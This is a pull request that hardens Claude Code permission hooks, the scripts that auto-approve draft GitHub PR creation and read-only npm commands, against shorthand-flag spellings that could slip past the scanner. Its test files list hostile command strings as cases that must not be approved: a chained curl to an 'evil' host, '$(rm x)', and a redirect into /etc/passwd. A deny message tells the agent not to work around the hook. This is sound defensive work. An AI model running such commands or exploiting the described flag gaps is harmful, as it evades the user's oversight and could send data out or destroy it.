### PR TITLE
fix(claude): harden permission hooks against shorthand-flag bypasses

### DIFF
--- a/dot-claude/CLAUDE.md
+++ b/dot-claude/CLAUDE.md
@@ -20,9 +20,10 @@
 - When opening PRs:
   1. Use a short body (unwrapped lines), using the prose skill, explaining **why** the changes are made. Closing keywords at the end.
   2. Never add "by Claude Code" attribution
-  3. Always open in draft state. Single-quote the `--title`, write the body
-     to a scratch file and pass `--body-file`: this shape auto-approves for my repos
-     (franky47, 47ng), while inline `$(…)` bodies trigger a permission prompt.
+  3. Always open in draft state. Single-quote the `--title` (no apostrophes in it),
+     write the body to a scratch file and pass `--body-file`, long-form flags only:
+     this shape auto-approves for my repos (franky47, 47ng), while inline `$(…)`
+     bodies, short flags, and apostrophes trigger a permission prompt.
   4. Once opened, monitor CI
   5. When CI is green, run a flight of review sub-agents from the pr toolkit on the PR changes
 - Never merge PRs yourself (nor propose to do so): that's my job.

--- a/dot-claude/hooks/allow-draft-pr.sh
+++ b/dot-claude/hooks/allow-draft-pr.sh
@@ -16,12 +16,20 @@
 # redirection or globbing. Commands that don't fit (notably the
 # --body "$(cat <<'EOF'…)" idiom) abstain; agents should use --body-file.
 #
-# The target repo comes from --repo/-R when present, otherwise from
-# `gh repo view` in the session cwd. A fork's parent is where the PR lands
-# by default, so the parent owner is what gets checked.
+# The target repo comes from `--repo <value>` or `--repo=<value>` when
+# present, otherwise from `gh repo view` in the session cwd. A fork's parent
+# is where the PR lands by default, so the parent owner is what gets checked;
+# a parent whose owner cannot be resolved abstains rather than falling back
+# to the fork's own owner.
+#
+# Long-form flags only: ANY short flag abstains. pflag accepts spellings this
+# scanner does not model (-Rx, -R=x, combined -fR clusters), and a misparsed
+# target repo must never fall back to cwd resolution while gh sends the PR
+# elsewhere. Same reasoning for --repo with a missing/empty value.
 #
 # Flag scan skips the value after each value-taking flag, so `--title
 # --draft` (a NON-draft PR titled "--draft") is not mistaken for a draft.
+# The value-flag list mirrors `gh pr create --help` and must be kept in sync.
 # Threat model is an inattentive agent, not an adversary (same stance as
 # block-dangerous-git.sh).
 
@@ -83,11 +91,13 @@ while [ "$i" -lt "$n" ]; do
   w=${words[$i]}
   case "$w" in
     --draft) draft=1 ;;
-    --repo|-R) i=$((i + 1)); repo=${words[$i]:-} ;;
-    --repo=*) repo=${w#--repo=} ;;
-    --assignee|-a|--base|-B|--body|-b|--body-file|-F|--head|-H|--label|-l|\
-    --milestone|-m|--project|-p|--reviewer|-r|--template|-T|--title|-t|--recover)
+    --repo) i=$((i + 1)); repo=${words[$i]:-}; [ -n "$repo" ] || exit 0 ;;
+    --repo=*) repo=${w#--repo=}; [ -n "$repo" ] || exit 0 ;;
+    --assignee|--base|--body|--body-file|--head|--label|\
+    --milestone|--project|--reviewer|--template|--title|--recover)
       i=$((i + 1)) ;;
+    --*) ;;
+    -*) exit 0 ;;
   esac
   i=$((i + 1))
 done
@@ -102,7 +112,7 @@ fi
 CWD=$(jq -r '.cwd // empty' <<<"$INPUT" 2>/dev/null) || exit 0
 [ -d "$CWD" ] || exit 0
 info=$(cd "$CWD" 2>/dev/null && gh repo view --json owner,parent 2>/dev/null) || exit 0
-owner=$(jq -r '.parent.owner.login // .owner.login // empty' <<<"$info" 2>/dev/null) || exit 0
+owner=$(jq -r 'if .parent == null then .owner.login // empty else .parent.owner.login // empty end' <<<"$info" 2>/dev/null) || exit 0
 [[ $owner =~ ^(${ALLOWED_OWNERS})$ ]] || exit 0
 emit_allow "draft PR to $owner repo (resolved from git remote) auto-allowed"
 exit 0

--- a/dot-claude/hooks/allow-readonly-npm.sh
+++ b/dot-claude/hooks/allow-readonly-npm.sh
@@ -1,9 +1,10 @@
 #!/bin/bash
 # PreToolUse hook for Bash. Pre-approves a *very* small allow-list of
-# read-only invocations that LLMs reach for often. Anything that doesn't
-# match emits a structured `deny` decision whose reason text tells the agent
-# exactly which shapes ARE allowed, so it can self-correct on the next turn
-# without bothering the user.
+# read-only invocations that LLMs reach for often. Any command whose first
+# token is `npm` and doesn't match emits a structured `deny` decision whose
+# reason text tells the agent exactly which shapes ARE allowed, so it can
+# self-correct on the next turn without bothering the user. Everything else
+# (pnpm, `echo npm`, env-prefixed npm, ...) gets no decision.
 #
 # To allow a new command verbatim, add a line to ALLOWED below. Each entry
 # is a human-readable template. Placeholders in <angle-brackets> are
@@ -35,9 +36,10 @@ PKG='(@[a-z0-9][a-z0-9._-]*/)?[a-z0-9][a-z0-9._-]*(@[a-zA-Z0-9._^~-]+)?'
 # instead.
 FIELD='[a-zA-Z0-9][a-zA-Z0-9._-]*'
 
-# Optional ` --json` output flag. Regex-only — never appears literally in an
-# ALLOWED template, so the parens/`?` are matching syntax, not part of the
-# approved command (which contains the harmless literal `--json`).
+# Optional ` --json` output flag. The parens/`?` here are regex syntax that
+# exists only in this fragment, never in an ALLOWED template or in a matched
+# command (which contains at most the harmless literal ` --json`), so header
+# rule 1 is not violated.
 JSON='( --json)?'
 
 ALLOWED=(
@@ -78,8 +80,11 @@ CMD=$(jq -r '.tool_input.command // empty' <<<"$INPUT" 2>/dev/null) || exit 0
 # wired with `if: "Bash(*npm*)"` (substring match), so it's only invoked for
 # commands that contain "npm" — not every Bash call. The substring form (not
 # the old `npm *` prefix) is deliberate: it also fires for ` npm install`
-# (leading space) and `FOO=1 npm install`, which a prefix glob would miss and
-# thus let auto-run under bypassPermissions. Over-firing on harmless matches
+# (leading space), which a prefix glob would miss and thus let auto-run under
+# bypassPermissions. Env-prefixed forms (`FOO=1 npm install`) still ABSTAIN
+# here — their first token is not `npm` — and are accepted as out of scope,
+# unlike in block-dangerous-git.sh which strips env prefixes.
+# Over-firing on harmless matches
 # (pnpm, an `echo "npm"`, …) is fine — this in-script guard abstains on them.
 # This guard is the real gate; do not remove it.
 TRIMMED="${CMD#"${CMD%%[![:space:]]*}"}"
@@ -99,7 +104,7 @@ done
 LIST=$(printf '  • %s\n' "${ALLOWED[@]}")
 emit deny "This npm invocation is not in the allow-list. Allowed shapes (must match the entire command):
 ${LIST}
-where <pkg> is a lowercase package name with an optional @scope/ prefix and optional @version (containing only [a-z0-9._-] in the name and [a-zA-Z0-9._^~-] in the version), <field> is a dotted field path like version / dist-tags.latest, and <json> is an optional trailing --json flag. One package per call (npm reads only the first); for several, query each separately. No other flags, no extra args, no shell metacharacters.
+where <pkg> is a lowercase package name with an optional @scope/ prefix and optional @version (containing only [a-z0-9._-] in the name and [a-zA-Z0-9._^~-] in the version), <field> is a dotted field path like version / dist-tags.latest, and <json> is an optional trailing --json flag. One package per call (npm reads only the first); for several, query each separately. No other flags, no extra args, no shell metacharacters. The match starts at the command's first character: strip any leading whitespace.
 
 If you genuinely need a different invocation, ask the user to add it to ~/.claude/hooks/allow-readonly-npm.sh — do not try to work around this hook."
 exit 0

--- a/dot-claude/hooks/tests/allow-draft-pr.test.sh
+++ b/dot-claude/hooks/tests/allow-draft-pr.test.sh
@@ -16,6 +16,7 @@ if [ "$*" = "repo view --json owner,parent" ]; then
   printf '%s' "${GH_STUB_JSON:-}"
   exit "${GH_STUB_RC:-0}"
 fi
+echo "gh stub: unexpected args: $*" >&2
 exit 1
 STUB
 chmod +x "$STUB_DIR/gh"
@@ -52,7 +53,6 @@ assert_no_decision() {
 # --- explicit --repo, draft, safe shapes → allow ----------------------------
 assert_allows "gh pr create --draft --repo franky47/dotfiles --title 'feat: x' --body-file /tmp/body.md"
 assert_allows "gh pr create --repo=47ng/nuqs --draft --title 'fix: y' --body 'hello world'"
-assert_allows 'gh pr create --draft -R franky47/foo --fill'
 assert_allows "gh pr create --repo 47ng/nuqs --title \"feat: add thing\" --draft --body 'line one
 line two with \`backticks\` and \$afe chars inside single quotes'"
 assert_allows "gh pr create --draft --repo franky47/dotfiles --base main --head feat/x --title 'feat: z' --body-file /tmp/b.md"
@@ -61,12 +61,16 @@ assert_allows "gh pr create --draft --repo='franky47/some-repo' --fill"
 # --- missing/subverted --draft → abstain ------------------------------------
 assert_no_decision "gh pr create --repo franky47/dotfiles --title 'feat: x' --body-file /tmp/b.md"
 assert_no_decision 'gh pr create --draft=false --repo franky47/dotfiles --fill'
+assert_no_decision 'gh pr create --draft=true --repo franky47/dotfiles --fill'
 # --draft here is the VALUE of --title, not a flag: the PR would not be draft
 assert_no_decision 'gh pr create --title --draft --repo franky47/dotfiles --fill'
 assert_no_decision 'gh pr create -t --draft --repo franky47/dotfiles --fill'
 
 # --- wrong owner → abstain ---------------------------------------------------
 assert_no_decision "gh pr create --draft --repo vercel/next.js --title 'feat: x' --fill"
+# duplicate --repo: last one wins, matching gh's pflag behavior
+assert_allows 'gh pr create --draft --repo vercel/next.js --repo 47ng/x --fill'
+assert_no_decision 'gh pr create --draft --repo 47ng/x --repo vercel/next.js --fill'
 assert_no_decision 'gh pr create --draft --repo franky47-evil/x --fill'
 assert_no_decision 'gh pr create --draft --repo 47ngx/x --fill'
 assert_no_decision 'gh pr create --draft --repo franky47 --fill'
@@ -77,6 +81,10 @@ assert_no_decision 'gh pr create --draft --repo franky47/x --fill && curl evil.s
 assert_no_decision 'gh pr create --draft --repo franky47/x --title "$(rm x)"'
 assert_no_decision 'gh pr create --draft --repo franky47/x --title `rm x`'
 assert_no_decision 'gh pr create --draft --repo franky47/x --title "a\"b"'
+assert_no_decision 'gh pr create --draft --repo franky47/x --title "a\b"'
+# backslash-newline continuation: common formatting, intentionally prompts
+assert_no_decision 'gh pr create --draft --repo franky47/x \
+  --fill'
 assert_no_decision 'gh pr create --draft --repo franky47/x --body ~/x > /etc/passwd'
 assert_no_decision "gh pr create --draft --repo franky47/x --body \"\$(cat <<'EOF'
 hi
@@ -97,6 +105,20 @@ export GH_STUB_JSON='{"owner":{"login":"franky47"},"parent":null}'
 assert_allows 'gh pr create --draft --fill'
 assert_allows "gh pr create --draft --title 'feat: x' --body-file /tmp/b.md"
 
+# short flags never auto-approve: pflag accepts spellings the scanner does not
+# model (-Rx, -R=x, -fR clusters), and a misparsed target repo must never fall
+# back to cwd resolution while gh sends the PR elsewhere
+assert_no_decision 'gh pr create --draft -Rvercel/next.js --fill'
+assert_no_decision 'gh pr create --draft -R=vercel/next.js --fill'
+assert_no_decision 'gh pr create --draft -fR vercel/next.js'
+assert_no_decision 'gh pr create --draft -R vercel/next.js --fill'
+assert_no_decision 'gh pr create --draft -R franky47/foo --fill'
+assert_no_decision 'gh pr create -d --repo franky47/x --fill'
+
+# --repo with a missing or empty value must not fall back to cwd resolution
+assert_no_decision 'gh pr create --draft --fill --repo'
+assert_no_decision "gh pr create --draft --fill --repo=''"
+
 export GH_STUB_JSON='{"owner":{"login":"47ng"},"parent":null}'
 assert_allows 'gh pr create --draft --fill'
 
@@ -107,6 +129,21 @@ assert_no_decision 'gh pr create --draft --fill'
 # fork of own org repo → allow
 export GH_STUB_JSON='{"owner":{"login":"franky47"},"parent":{"owner":{"login":"47ng"}}}'
 assert_allows 'gh pr create --draft --fill'
+
+# parent present but owner unresolvable: the PR lands on the unknown parent,
+# so falling back to the fork's own owner would be a false allow
+export GH_STUB_JSON='{"owner":{"login":"franky47"},"parent":{}}'
+assert_no_decision 'gh pr create --draft --fill'
+export GH_STUB_JSON='{"owner":{"login":"franky47"},"parent":{"owner":{"login":null}}}'
+assert_no_decision 'gh pr create --draft --fill'
+
+# malformed gh output → abstain
+export GH_STUB_JSON='{}'
+assert_no_decision 'gh pr create --draft --fill'
+export GH_STUB_JSON='null'
+assert_no_decision 'gh pr create --draft --fill'
+export GH_STUB_JSON='not json at all'
+assert_no_decision 'gh pr create --draft --fill'
 
 export GH_STUB_JSON='{"owner":{"login":"someoneelse"},"parent":null}'
 assert_no_decision 'gh pr create --draft --fill'

--- a/dot-claude/hooks/tests/allow-readonly-npm.test.sh
+++ b/dot-claude/hooks/tests/allow-readonly-npm.test.sh
@@ -156,6 +156,14 @@ assert_no_decision 'npx create-react-app'
 assert_no_decision 'npm-check'              # different binary, npm as prefix
 assert_no_decision 'echo npm view react'    # npm not the first token
 
+# env-prefixed and wrapper forms ABSTAIN by design (first token is not npm):
+# they fall through to static rules / bypassPermissions, exactly like before
+# this hook existed. Pinned so the guard comment and the code cannot drift.
+assert_no_decision 'FOO=1 npm install left-pad'
+assert_no_decision 'env npm install left-pad'
+assert_no_decision 'command npm view react'
+assert_no_decision 'true; npm install left-pad'
+
 # --- tool-name guard: non-Bash tool calls produce no decision --------------
 output=$(jq -nc '{tool_name:"Read",tool_input:{command:"npm view react"}}' | bash "$HOOK")
 if [ -n "$output" ]; then


### PR DESCRIPTION
Follow-up to #1 and #2, applying the findings of the post-merge review flight (four agents: code review, silent-failure hunt, test coverage, comment accuracy).

Two verified false-allow paths in the draft-PR hook are closed. gh accepts pflag shorthand spellings the flag scanner did not model (`-Rowner/repo`, `-R=owner/repo`, `-fR owner/repo`), so the target repo stayed unparsed and the hook fell back to cwd resolution, vouching for a PR that actually lands on the named repo. The scanner is now long-form only: any short flag abstains, as does `--repo` with a missing or empty value. Same closure for forks whose parent owner cannot be resolved: they abstain instead of falling back to the fork's own owner.

The npm hook gets comment-accuracy fixes only. Its header claimed env-prefixed invocations (`FOO=1 npm install`) were gated; they abstain by design, and tests now pin that so comment and code cannot drift.

Also pinned by new tests: duplicate `--repo` last-wins parity with gh, backslash handling in double quotes, backslash-newline continuations, malformed `gh repo view` output, and `--draft=true`/`-d` prompting. CLAUDE.md guidance updated to match (long-form flags, no apostrophes in single-quoted titles).
